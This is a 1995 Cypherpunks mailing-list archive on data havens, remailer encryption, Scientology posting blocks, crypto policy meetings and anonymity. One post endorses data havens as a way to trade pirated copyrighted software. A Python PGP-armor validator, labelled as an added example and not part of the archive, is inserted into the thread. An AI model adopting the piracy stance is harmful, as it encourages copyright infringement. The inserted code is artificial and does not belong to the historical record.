COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From rrothenb at libws4.ic.sunysb.edu Sat Jan 14 20:45:53 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Sat, 14 Jan 95 20:45:53 PST Subject: Another problem w/Data Havens... 
Message-ID: <9501150445.AA13977@toad.com> I can see a potential problem with Data Havens (as they've been discussed here) that may very well inspire the wrath of the authorities more than nuclear secrets or dirty pictures of J.Edgar Hoover... How does one keep a site from becoming a remote pirated-software exchange site? (Esp. since after that MIT case laws may be changed...) It seems that such a service could become a magnet for the "elite warez" crowd... and even if the operator isn't jailed it could lead to a shutdown of the service. From pstemari at erinet.com Sat Jan 14 22:02:40 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 14 Jan 95 22:02:40 PST Subject: How do I know if its encrypted? Message-ID: <9501150554.AA29412@eri.erinet.com> At 11:53 AM 1/14/95 -0600, Larry E wrote: > ... Those who believe remailers are an evil will argue against any >measure that will promote their presence (and I'm not suggesting >you're in that group). ... True enough. > ... Is encryption a step in the right direction, if an imperfect one? If >not I hope some other positive steps are proposed soon, else I fear >remailers may face extinction. The big problem I have with mandatory encryption for remailers is that it thwarts one of the two major purposes of remailers. Basically I see remailers serving two goals: 1) Defeating traffic analysis of point-to-point communications. Mandating encryption for this is redundant--anyone who wanted this would be encrypting their mail to begin with. Also, I don't believe this mode of operation generates many complaints. 2) Anonymous broadcast transmission. This one can generate a lot of complaints, but it is also very important for things like *.recovery newsgroups. Mandating encryption renders this mode useless. There is a third use, which is anonymous point-to-point transmission. While this is of some benefit for anonymous tip line, it makes things like mailbombs and hate mail very easy. --Paul J. Ste. 
Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Sat Jan 14 22:02:48 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 14 Jan 95 22:02:48 PST Subject: How do I know if its encrypted? Message-ID: <9501150554.AB29412@eri.erinet.com> At 10:51 AM 1/14/95 -0700, Ben.Goren at asu.edu wrote: > ... Dave certainly doesn't want to know what Alice is sending him, because he >might have to answer to a Grand Jury if he did. ... > >Of course, any data haven worth paying for will offer lots of neat >features, like PGP support, anonymous file drops, and all other sorts of >goodies. But that does little good if Alice can trick Dave into selling >child pornography. ... At 11:45 PM 1/14/95, Robert Rothenberg wrote: > ... How does one keep a site from becoming a remote pirated-software exchange >site? (Esp. since after that MIT case laws may be changed...) It seems that >such a service could become a magnet for the "elite warez" crowd... and even >if the operator isn't jailed it could lead to a shutdown of the service. The whole point of a "data haven" is that the site of operation is in a jurisdiction where these things are not legal problems. If you operate a DH in a location where child pornography/copyright laws are vigorously enforced, I really doubt that encryption is going to make any difference. As Robert rightly points out, a DH probably will become a location of massive copyright violation, etc ad nauseam. I've cc'ed Mike Godwin on this in the hope that he can shed some light on what the scienter requirements for something like this would be. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From j.hastings6 at genie.geis.com Sun Jan 15 00:26:31 1995 From: j.hastings6 at genie.geis.com (j.hastings6 at genie.geis.com) Date: Sun, 15 Jan 95 00:26:31 PST Subject: L.A. 
area-Karl Hess Club Message-ID: <199501150826.AA027478379@relay2.geis.com> The following was written by me, Kent Hastings: Sorry, no PGP sig, I'm stranded in Chico,CA for a while... L O S A N G E L E S A R E A M E E T I N G "Extremism in the defense of liberty is no vice, and let me remind you, moderation in the pursuit of justice is no virtue." - Aristotle, as used by Karl Hess for Barry Goldwater. --- T h e K a r l H e s s C l u b --- "GOODBYE, MURRAY!" In the third meeting in the Post Election Series, we intended to present an update on the Objectivists after our meetings with the Republicans, the Libertarian Party, and Left Anarchists. Unfortunately, the Ayn Rand Institute declined our invitation to address our group on The Night Of January The 16th. When readers of Liberty Magazine were asked to rate the influence of various thinkers, at the top, with an equal rating to Rand, was "Mr. Libertarian," Murray N. Rothbard, PhD. Murray died last week, so we will instead have a special Memorial tribute to his life and thought. He is best known for his work in Austrian School economics and Libertarian philosophy, and notorious for bashing Objectivists with essays like "The Sociology of the Ayn Rand Cult." (Don't worry, the abuse was mutual). His most recent libertarian strategy was to make an alliance with the Old Right, a.k.a. "Paleoconservatives." We hope you'll agree that this is relevant in our Post Election environment. Samuel Edward Konkin III (SEK3) knew Murray personally, and credits him as a founder of the modern Libertarian movement in written accounts in his magazine, New Libertarian. I assume SEK3 will host tributes from others who also knew Murray. Monday, January 16, 1995 Hasmik's Family Restaurant Cheviot Hills neighborhood of Los Angeles National Blvd (I think 9824 National) Unfortunately, I can't attend this one because of the floods, and I don't have the address handy, but it is the same time and place as the last meeting. 
Kent - j.hastings6 at genie.geis.com From lce at wwa.com Sun Jan 15 01:09:10 1995 From: lce at wwa.com (Larry E) Date: Sun, 15 Jan 95 01:09:10 PST Subject: How do I know if its encrypted? In-Reply-To: <9501150554.AA29412@eri.erinet.com> Message-ID: In article <9501150554.AA29412 at eri.erinet.com>, pstemari at erinet.com (Paul J. Ste. Marie) wrote: > > 1) Defeating traffic analysis of point-to-point communications. > Mandating encryption for this is redundant--anyone who wanted this > would be encrypting their mail to begin with. Also, I don't > believe this mode of operation generates many complaints. Agreed. > > 2) Anonymous broadcast transmission. This one can generate a lot of > complaints, but it is also very important for things like *.recovery > newsgroups. Mandating encryption renders this mode useless. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Here, I don't understand your point. If you mean an encrypted message to a remailer cannot result in a plaintext usenet posting, that of course is not true. The remailers have PGP keys of their own, just as any private user may. In addition, some of the remailers support direct usenet posting. Thus, a message may be encrypted to the remailer and posted as plaintext as the remailer decrypts the message. > There is a third use, which is anonymous point-to-point transmission. While > this is of some benefit for anonymous tip line, it makes things like > mailbombs and hate mail very easy. > Agreed. At least some remailers accept requests from users that they not receive anonymous mail. The process of "kill-filing" outbound anonymous mail targeted for specific locations could of course be automated. From lcottrell at popmail.ucsd.edu Sun Jan 15 12:41:36 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Sun, 15 Jan 95 12:41:36 PST Subject: Scientology Message-ID: -----BEGIN PGP SIGNED MESSAGE----- 1/15/95 TO: THOMAS M. SMALL COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE PUBLICATIONS, INC. 
FROM: Lance Cottrell Operator of remailer at nately and mixmaster at nately In response to your email of January 3, 1995 requesting that I block anonymous posting to the Internet news groups alt.clearing.technology and alt.religion.scientology. Although my remailers have always supported direct posting to news groups, this feature has never been advertised or supported. Since direct posting from my remailers is never used, I am willing to comply with your request. Posting to alt.clearing.technology and alt.religion.scientology has been blocked. By this action I do not admit to any wrongdoing on my part, nor do I wish to imply any wrongdoing on the part of any users of my remailers. I am merely turning off a feature that I never intended to be used. By design it is not possible to prevent users from using my remailers to send a message to another computer to be posted. I can not, and will not, block mail to other remailers or to mail-to-news gateways. Yours, Lance M. Cottrell CC: Cypherpunks at toad.com, remailer-operators at c2.org, alt.privacy.anon-server, alt.privacy, alt.religion.scientology, alt.clearing.technology -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3 ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94 EH/mStSfdJY= =UgN1 -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Sun Jan 15 12:42:01 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 15 Jan 95 12:42:01 PST Subject: 2 announcements of possible interest Message-ID: <199501152041.PAA10484@bwh.harvard.edu> 2 announcements (one from PRIVACY, the other from Cyberia.) 
second is NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW 01/12/95 Date: Fri, 13 Jan 95 11:25:27 EST From: denning at cs.cosc.georgetown.edu (Dorothy Denning) Subject: INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995 Call for Participation (Deadline: March 15, 1995) INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995: GLOBAL CHALLENGES September 21-22, 1995 Washington, DC Presented by The National Intellectual Property Law Institute The International Cryptography Institute will focus on the cryptography challenges associated with meeting the information protection needs of users and the law enforcement and national security needs of nations. The Institute will address such topics as: - national encryption policies and regulations - meeting user needs for information security and data recovery - meeting law enforcement and national security needs - national and global encryption markets and product availability - international approaches and standards - creating an international cryptography infrastructure - the use of encryption technologies in different countries - cryptography in the financial industry and other industries - legal and policy issues of digital signatures and digital cash - new developments in encryption policies and technologies Persons interested in speaking at the conference are invited to submit a proposal to the Institute Chair: Prof. Dorothy E. Denning, Chair ICI '95 Georgetown University Computer Science Department 225 Reiss Building Washington DC 20057-0997 ph: 202-687-5703, fax: 202-687-6067 e-mail: denning at cs.georgetown.edu Proposals must be received by MARCH 15, 1995, and should include the following: - Name, title, organization, address, phone, fax, and e-mail address - Brief biography - Title of presentation - Abstract of presentation or paper - Amount of time requested for presentation and discussion Notification of acceptance will be made by April 15, 1995. Papers and materials for the proceedings will be due on August 15, 1995. 
Inquiries about registration or the proceedings should be addressed to: The National Intellectual Property Law Institute P.O. Box 27913, Washington, DC 20038-7913 ph: 800-301-MIND or 202-962-9494 fax: 800-304-MIND or 202-962-9495 ------------------------------ From: Seth Greenstein Subject: NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW 01/12/95 OFFICE OF MANAGEMENT AND BUDGET NOTICE OF PUBLIC MEETING Agency: Office of Management and Budget Action: National Information Infrastructure Security Issues Forum: Notice of Public Meetings and request for public comments SUMMARY: The National Information Infrastructure Security Issues Forum will conduct two public meetings to continue a dialogue between government and the private and public interest sectors on issues related to the security of information on the National Information Infrastructure (NII). Interested parties -- especially beneficiaries of Aid to Families with Dependent Children and Food Stamps, and users of public information, and participants in the sophisticated communications networks which support the U.S. transportation and customs systems -- are invited to submit a 1 - 2 page position statement and request to testify. The meetings are sponsored by the NII Security Issues Forum of the Information Infrastructure Task Force and Mega-Project III of the U.S. Advisory Council on the NII. DATES: Both public meetings, "Security of the Electronic Delivery of Government Information and Services" and "Security for Intelligent Transportation Systems and Trade Information," will be held simultaneously on Friday, January 27, 1995, from 9:00 a.m. to 12:30 p.m. in Raleigh, North Carolina. Those wishing to testify should submit a 1 - 2 page position statement and request to participate by January 20, 1995. Individuals wishing to offer general comments or present questions may request to do so during the meeting. 
Written comments may be submitted on paper or electronically, in ASCII format, and will be accepted until February 10, 1995. ADDRESSES: The public meeting, "Security of the Electronic Delivery of Government Information and Services," will be held in the Auditorium of the North Carolina Museum of History, 1 East Edenton Street, Raleigh, North Carolina. The public meeting, "Security for Intelligent Transportation Systems and Trade Information," will be held in the Auditorium of the Department of Cultural Affairs, 109 East Jones Street, Raleigh, North Carolina. Both buildings are in close proximity to the North Carolina Capitol Building. Position statements and requests to appear for the meeting, "Security of the Electronic Delivery of Government Information and Services," sent to the Government Information Technology Services Working Group, marked to the attention of Ms. April Ramey, U.S. Department of the Treasury, 1425 New York Avenue, Room 2150 N.W., Washington, D.C. 20220. Position statements may also be submitted via fax to (202) 622-1595 or through electronic mail to april.ramey at treas.sprint.com. Electronic mail should be submitted as unencoded, unformatted, ASCII text. Position statements and requests to appear for the meeting, "Security for Intelligent Transportation Systems and Trade Information," should be sent to the Volpe National Transportation Systems Center of the Department of Transportation, marked to the attention of Mr. Gary Ritter, DTS-21, at 55 Broadway, Cambridge, MA, 02142. Position statements may also be submitted via fax to (617) 494-2370 or through electronic mail to "Ritter at volpe1.dot.gov". Electronic mail should be submitted as unencoded, unformatted, ASCII text. Parties offering testimony are asked to provide them on paper, and where possible, in machine-readable format. 
Machine-readable submissions may be provided through electronic mail messages sent over the Internet, or on a 3.5" floppy disk formatted for use in an MS-DOS based computer. Machine-readable submissions should be provided as unencoded, unformatted ASCII text. Written comments should include the following information: * Name and organizational affiliation, if any, of the individual responding; * An indication of whether comments offered represent views of the respondent's organization or are the respondent's personal views; and * If applicable, information on the respondent's organization, including the type of organization (e.g., trade association, private corporation, non-profit organization) and general areas of interest. FOR FURTHER INFORMATION CONTACT: For further information relating to electronic delivery of information and services, contact Ms. April Ramey of the Treasury Department at (202) 622-1278. For further information relating to transportation and trade issues, contact Mr. Gary Ritter at the Volpe National Transportation Systems Center by telephone at (617) 494-2716. SUPPLEMENTARY INFORMATION: I. Issues for Public Comment A. Background The public meetings are part of an ongoing dialogue with the Administration to assess the security needs and concerns of users of the National Information Infrastructure (NII). The NII is a system of high-speed telecommunications networks, databases, and advanced computer systems that will make electronic information more widely available and accessible than ever before. For example, citizens may be able to learn about federal benefits programs through public kiosks, or may receive their social security payments through direct deposit to their bank accounts. As the U.S. transportation infrastructure becomes more complex, Americans will benefit from the application of information technologies to such operations as toll collection, motor vehicle registration, and traffic routing. 
This increased availability and accessibility of services and products provided through information technology will dramatically affect the way in which individuals conduct their everyday affairs. Consequently, broad public and commercial use of the NII hinges upon implementing technologies, policies, and practices that not only ensure that users of information systems have access to information when and where they need it, but that subjects of information records are able to protect themselves from unauthorized or inappropriate use of information. "Americans will not use the NII to its full potential unless they trust that information will go where and when they want it and nowhere else," declared Sally Katzen, Administrator of the Office of Information Regulatory Affairs at OMB and chair of the Forum. "The Federal government is a primary user of the NII and thus a catalyst for change. Yet the NII will be designed, built, owned, operated, and used primarily by the private sector, making it essential that security on the NII be considered in partnership with the public." To address these critical issues, the Vice President formed the Information Infrastructure Task Force (IITF). The IITF is chaired by Secretary of Commerce Ron Brown and is comprised of senior Administration officials having expertise in technical, legal, and policy areas pertinent to the NII. The mission of the IITF is to articulate and implement the Administration's vision for the NII. The NII Security Issues Forum was established within the IITF to address the cross-cutting issue of security in the NII. The Forum is chaired by Sally Katzen, Administrator of the Office of Information and Regulatory Affairs in the Office of Management and Budget. In addition to the IITF, the President has established the U.S. Advisory Council on the National Information Infrastructure. 
The Advisory Council represents industry, labor, and public interest groups, and advises the Secretary of Commerce on issues relating to the NII. Mega-Project III, one of three work groups of the Advisory Council, is responsible for addressing security, intellectual property, and privacy issues as they relate to the NII. B. Structure and Content of Public Meeting Security is linked inextricably to broad public use of the NII. The technologies, policies, and procedures used to ensure the confidentiality, availability, and integrity of digitally produced and transmitted information, information products, and services on the NII will determine whether, how, and to what extent digitally linked information services will be broadly used in such critical applications as providing public information, supporting the delivery of government services, utilizing intelligent transportation systems, and conducting trade. Development of policies and procedures that will ensure the security of public and private information and communications on the NII requires study from different perspectives, whether that of the subject of the information, the user of the information, or the creator of the information. The Forum and Mega-Project III seek input from parties representing beneficiaries of federal information and services and users of intelligent transportation systems and trade data. Solutions to these concerns will come via technical solutions, as well as legal and policy mechanisms. The Forum and Mega-Project III seek input in this area as well. Specifically, what legal measures, policy mechanisms, and technological solutions, or combinations thereof, can be used to effectively protect the security of federal benefits information or transportation or trade data, delivered or made accessible on the NII? 
A panel of witnesses drawn from the public will be assembled to discuss the following topics with a panel of senior Administration officials, members of the Security Issues Forum, members of the Advisory Council, and policy makers at the State level, and to field questions and comments from other members of the public. Position statements for the meeting, "Security in the Delivery of Electronic Information and Services," should address four principal questions: 1. How do you envision the NII being used to provide services and information electronically to citizens? Specifically, what types of services and information should be delivered or made available? 2. What risks and threats do you foresee in making services and information available via the NII? Such threats might include fraud, unauthorized access, breach of confidentiality or privacy, breach of integrity, and system performance. 3. What legal, policy, and ethical issues do you foresee affecting usage of the NII? Such issues may include liability, information/property rights, access, document/records management, legal admissibility/evidentiary requirements, and auditability. Do some issues, such as privacy and open access, tend to countervene each other? 4. What kinds of administrative or technical solutions should be developed or promoted to address security, legal, and ethical concerns? Such solutions may include verifying recipient and/or vendor eligibility, ensuring operational and systems security, and establishing means to facilitate settlement, detection, and prosecution. Position statements for the meeting, "Security for Intelligent Transportation Systems and Trade Information," should address five principal questions: 1. Who should be permitted access to sensitive trade and transportation information systems? How can inappropriate access and use be prevented? 2. 
What technical and institutional safeguards in electronic data transmission, storage, and retrieval are needed to protect the security of trade and transportation data? Such risks might include: disclosure of proprietary and confidential business information, criminal access to trade and cargo records, disclosure of individual travel patterns or vehicle locations, or disclosure of transportation dispatch communications regarding sensitive cargo shipment routes, itineraries, and locations. 3. What does an "appropriate level of security" consist of? Is there a "one-size-fits-all" solution, or can policies be established which flexibly meet diverse needs? 4. Do certain systems merit greater degrees of security protection, such as traffic signal control systems, variable message signs, fleet location monitoring, electronic toll collection, international trade data, and motor vehicle registration records? 5. Who should establish and enforce security policies? How can government and the private sector work together to support a secure National Information Infrastructure? II. Guidelines for Participation in the Public Hearing Individuals who would like to participate on a panel must request an opportunity to do so no later than January 20, 1995, by submitting a brief, 1 - 2 page summary position statement. If approved, each participant will be allowed to present brief opening remarks. Primary participation, however, shall be during the general discussion to follow, according to the format described above. Participants in the public meeting will testify before and participate in discussions with a panel consisting of members of the Advisory Council, members of the Security Issues Forum, and other Administration officials. Individuals not selected as panel participants may offer comments or ask questions of the witnesses by requesting an opportunity to do so and being recognized during the meeting by the chairs of the meetings. 
Oral remarks offered in this fashion should not exceed three minutes. No advance approval is required to attend the public meetings, offer comments, or present questions. The public meeting on "Security of the Electronic Delivery of Information and Services" will be chaired by Mr. Jim Flyzik, Chair of the Government Information Technology Services Working Group of the IITF. The public meeting on "Security for Intelligent Transportation Systems and Trade Information," will be co-chaired by Ms. Ana Sol Gutierrez, Deputy Administrator of the Research and Special Programs Administration of the U.S. Department of Transportation, and Ms. Christine Johnson, Director of the Intelligent Transportation Systems Joint Program Office of the U.S. Department of Transportation. More information about the Clinton Administration's National Information Infrastructure initiative can be obtained from the IITF Secretariat. Inquiries may be directed to Yvette Barrett at (202) 482-1835, by e-mail to ybarrett at ntia.doc.gov, or by mail to U.S. Department of Commerce, IITF Secretariat, NTIA, Room 4892, Washington, D.C., 20230. For inquiries over the Internet to the IITF Gopher Server, gopher, telnet (login = gopher), or anonymous ftp to iitf.doc.gov. Access is also available over the World-Wide-Web. Questions may be addressed to nii at ntia.doc.gov. For access by modem, dial (202) 501-1920 and set modem communication parameters at no parity, 8 data bits, and one stop (N,8,1). Modem speeds of up to 14,400 baud are supported. Sally Katzen Administrator, Office of Information and Regulatory Affairs Certified to be a true copy of the original by John B. 
Arthur, Associate Director for Administration From entropy at IntNet.net Sun Jan 15 12:45:33 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 12:45:33 PST Subject: Dangerous Web Site In-Reply-To: Message-ID: > They do credit checks of any person, SS# ID's, national database > searches, etc of any person or business (for a small fee). I actually found it at the "Internet Credit Bureau": http://www.satelnet.org/credit/ .. their e-mail address is icb at satelnet.org. It strikes me that their service makes it incredibly easy to breach the Fair Credit Reporting Act.. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From eric at remailer.net Sun Jan 15 12:46:09 1995 From: eric at remailer.net (Eric Hughes) Date: Sun, 15 Jan 95 12:46:09 PST Subject: voice pgp In-Reply-To: <950114234444_73211.3713_DHI35-1@CompuServe.COM> Message-ID: <199501151705.JAA00195@largo.remailer.net> From: Loren Fleckenstein <73211.3713 at compuserve.com> I've heard mention that Phil Zimmermann was going to demonstrate Voice PGP at the January Cypherpunks meeting at Cygnus. 1. We've been meeting at SGI for several months now. 2. Phil Z. was there; there was no demo. Draw your own conclusions. Eric From entropy at IntNet.net Sun Jan 15 12:46:22 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 15 Jan 95 12:46:22 PST Subject: Crypto functions In-Reply-To: <9501102208.AA26444@snark.imsi.com> Message-ID: > I wouldn't use BLOWFISH. Why? > MD4 is flawed -- and its a hash function, not a crypto function (as is > MD5). I'm curious - do you view one-way hash functions as nonessential for crypto? -jon ( --------[ Jonathan D. 
Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From entropy at IntNet.net Sun Jan 15 12:46:32 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Sun, 15 Jan 95 12:46:32 PST
Subject: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID:

> Some sites may only accept encrypted files, which reduces the spam
> potential considerably, as well as reducing your exposure to the
> porn police, though it's difficult to do anything about files that are
> encrypted with a public key whose private key has been posted to the net,
> or fake crypto headers in an otherwise unencrypted file,

This is interesting; during the last week or so that I've not been current with the list, I've started to implement a data-haven that takes information over sockets or MIME e-mail, and requires the use of PGP keypairs for the data. I don't *WANT* to know what data they're transferring me.

If digicash would ever reply to one of my applications, I could sell it on a digicash/day basis. Blah. Neat idea, but the $ part is kinda limiting.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From asgaard at sos.sll.se Sun Jan 15 12:47:17 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Sun, 15 Jan 95 12:47:17 PST
Subject: Another problem w/Data Havens...
In-Reply-To: <9501150445.AA13977@toad.com>
Message-ID:

Robert Rothenberg wrote:

> such a service could become a magnet for the "elite warez" crowd...

What's wrong with young, curious eLiTiStS running storing sites for mutual benefits ('warez')? Some say copyright is dead. Others have taken this to their hearts, especially for private use, and I don't blame them.
Copyrighted data on a server in a jurisdiction that doesn't acknowledge the copyrights - a prime use for Data Havens when they come of age.

Mats

From jsled at free.org Sun Jan 15 12:48:04 1995
From: jsled at free.org (Josh Michael Sled)
Date: Sun, 15 Jan 95 12:48:04 PST
Subject: C`punks slogan? - Pri
Message-ID: <199501151237.MAA02068@squeaky.free.org>

lmccarth at thor.cs.umass.ed wrote:

> Lest we suffer a recurrence of the C'punks Logo thread, which generated a
> whole raft of list traffic which would have been better kept private, please
> reply directly to Joshua and not to the whole list. [He seems to imply that
> he wants private replies ("testing procmail") anyway, but I want to encourage
> this practice explicitly.]

Thanks... actually, that's exactly what I wanted, but forgot to put it in... and my last post about "Slogan help": disregard that entirely... it's not needed (either part). But so far I've only gotten one reply about the slogan thing, so please give me help on that one, folks...

Josh Sled

---
KWQ/2 1.2g NR "MTV get off the air!" - DKs

From Ben.Goren at asu.edu Sun Jan 15 14:01:27 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Sun, 15 Jan 95 14:01:27 PST
Subject: Another problem w/Data Havens...
Message-ID:

At 9:45 PM 1/14/95, Robert Rothenberg wrote:
>[. . .]
>How does one keep a site from becoming a remote pirated-software exchange
>site? [. . . .]

Simple. The file is deleted upon retrieval.

b&

--
Ben.Goren at asu.edu, Arizona State University School of Music
Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.
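Added example, not part of any archived message and not code from the data haven described in the "Data Haven problems" post above: a Python check for the policy that thread raises, accepting only submissions whose OpenPGP packet structure is public-key encrypted and rejecting a PGP armor header wrapped around unencrypted data. All function names and sample inputs are assumptions constructed here; the check is structural only and, as the thread notes, cannot tell whether the matching private key has been posted.

```python
import base64

BEGIN = "-----BEGIN PGP MESSAGE-----"
END = "-----END PGP MESSAGE-----"

def crc24(data):
    """CRC-24 that OpenPGP ASCII armor appends (RFC 4880, section 6.1)."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF

def dearmor(text):
    """Return the binary packets inside a PGP MESSAGE armor, or raise ValueError."""
    lines = [line.strip() for line in text.strip().splitlines()]
    if BEGIN not in lines or END not in lines[lines.index(BEGIN):]:
        raise ValueError("no PGP MESSAGE armor")
    start = lines.index(BEGIN)
    block = lines[start + 1:lines.index(END, start)]
    if "" not in block:  # armor headers such as "Version:" end at a blank line
        raise ValueError("no blank line after the armor headers")
    body = block[block.index("") + 1:]
    if not body or not body[-1].startswith("="):
        raise ValueError("missing CRC-24 line")
    try:
        data = base64.b64decode("".join(body[:-1]), validate=True)
        stated = base64.b64decode(body[-1][1:], validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        raise ValueError("armor body is not base64") from None
    if int.from_bytes(stated, "big") != crc24(data):
        raise ValueError("CRC-24 mismatch")
    return data

def packet_tags(data):
    """Walk every packet header and return the tags; raise ValueError if malformed."""
    tags, pos, end = [], 0, len(data)
    def take(count):
        nonlocal pos
        if pos + count > end:
            raise ValueError("truncated packet")
        pos += count
        return data[pos - count:pos]
    while pos < end:
        hdr = take(1)[0]
        if not hdr & 0x80:
            raise ValueError("not an OpenPGP packet header")
        if hdr & 0x40:  # new-format header
            tag, more = hdr & 0x3F, True
            while more:
                first = take(1)[0]
                more = 224 <= first < 255  # partial body length: another chunk follows
                if first < 192:
                    size = first
                elif first < 224:
                    size = ((first - 192) << 8) + take(1)[0] + 192
                elif first == 255:
                    size = int.from_bytes(take(4), "big")
                else:
                    size = 1 << (first & 0x1F)
                take(size)
        else:  # old-format header, the kind PGP 2.6.x writes
            tag, ltype = (hdr >> 2) & 0x0F, hdr & 0x03
            size = end - pos if ltype == 3 else int.from_bytes(take(1 << ltype), "big")
            take(size)
        tags.append(tag)
    return tags

def check_submission(text):
    """Accept only PKESK packets (tag 1) followed by one encrypted-data packet (9 or 18)."""
    try:
        tags = packet_tags(dearmor(text))
    except ValueError as exc:
        return False, str(exc)
    if len(tags) >= 2 and set(tags[:-1]) == {1} and tags[-1] in (9, 18):
        return True, "public-key encrypted"
    return False, "unexpected packet sequence %r" % (tags,)

def old_packet(tag, body):  # constructed-sample helper: old format, two-octet length
    return bytes([0x80 | (tag << 2) | 1]) + len(body).to_bytes(2, "big") + body

def armor(data):  # constructed-sample helper: wrap packets in ASCII armor
    b64 = base64.b64encode(data).decode()
    rows = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    crc = base64.b64encode(crc24(data).to_bytes(3, "big")).decode()
    return "\n".join([BEGIN, "Version: constructed sample", ""] + rows + ["=" + crc, END])

# Constructed inputs; the packet bodies are filler bytes, not real ciphertext.
SAMPLE_ENCRYPTED = armor(old_packet(1, bytes(140)) + old_packet(9, bytes(range(200))))
SAMPLE_ARMORED_PLAINTEXT = armor(old_packet(11, b"b\x00\x00\x00\x00\x00not encrypted"))
SAMPLE_NO_CRC = "\n".join([BEGIN, "Version: 2.6.2", "", "blahblahblah", END])

if __name__ == "__main__":
    for sample in (SAMPLE_ENCRYPTED, SAMPLE_ARMORED_PLAINTEXT, SAMPLE_NO_CRC):
        print(check_submission(sample))
```

The check looks only at armor and packet headers; it never decrypts, so it does not establish that the body of the encrypted-data packet is real ciphertext.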
From ianf at sydney.sgi.com Sun Jan 15 15:56:47 1995
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Sun, 15 Jan 95 15:56:47 PST
Subject: Draft of editorial to SF Chronicle
In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com>
Message-ID: <9501161049.ZM27032@wiley.sydney.sgi.com>

On Jan 13, 10:23pm, Raph Levien wrote:
> Negative response was immediate. The perpetrators were asked to stop,
> but they refused to. One Norwegian hacker took it upon himself to
> track down and "cancel" the offending messages. Most people on the Net
> considered this to be entirely appropriate.

It would probably be more accurate to say that there was little condemnation of this action, and quite a groundswell of support for the move.

> A number of other self-promoting hucksters have sensed an opportunity,
> and have performed similar spams. In response, the Net evolved a
> defense mechanism to counter these spams and minimize the damage. The
> person currently serving this role is known by the pseudonym
> "CancelMoose." Almost everyone on the Net supports this effort, and
> agrees that it improves the overall value of Usenet.

Ditto.

> In many countries (and even China is on the Net these days), writings
> critical of the government, such as exposure of human rights abuses,
> are illegal. The authors face imprisonment, torture and death. By
> posting anonymously to the Net, the information can be brought safely
> to the attention of the world.

Perhaps mention the Russian coup, where the net became a conduit for information leaving Moscow. I remember a colleague of mine announcing incidents which had occurred within Moscow hours before the news services broadcast them, simply by getting emails from a colleague nearby,

Ian.

From rishab at dxm.ernet.in Sun Jan 15 16:38:24 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sun, 15 Jan 95 16:38:24 PST
Subject: Jude Milhon in WIRED
Message-ID:

WIRED 3.02 (February) interviews Jude Milhon (St.
Jude) who "is a charter member of the cypherpunks - a term that she coined." I didn't even know there _was_ a charter.

The interview as such is mainly about why "girls _need_ modems."

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                        "In between the breaths is
rishab at dxm.ernet.in                   the space where we live"
rishab at arbornet.org                           - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA

From root at einstein.ssz.com Sun Jan 15 16:50:09 1995
From: root at einstein.ssz.com (root)
Date: Sun, 15 Jan 95 16:50:09 PST
Subject: Draft of editorial to SF Chronicle
In-Reply-To: <9501161049.ZM27032@wiley.sydney.sgi.com>
Message-ID: <199501160027.SAA00332@einstein.ssz.com>

>
> Ditto.
>
> > In many countries (and even China is on the Net these days), writings
> > critical of the government, such as exposure of human rights abuses,
> > are illegal. The authors face imprisonment, torture and death. By
> > posting anonymously to the Net, the information can be brought safely
> > to the attention of the world.
>
> Perhaps mention the Russian coup, where the net became a conduit for
> information leaving Moscow. I remember a colleague of mine announcing
> incidents which had occurred within Moscow hours before the news services
> broadcast them, simply by getting emails from a colleague nearby,
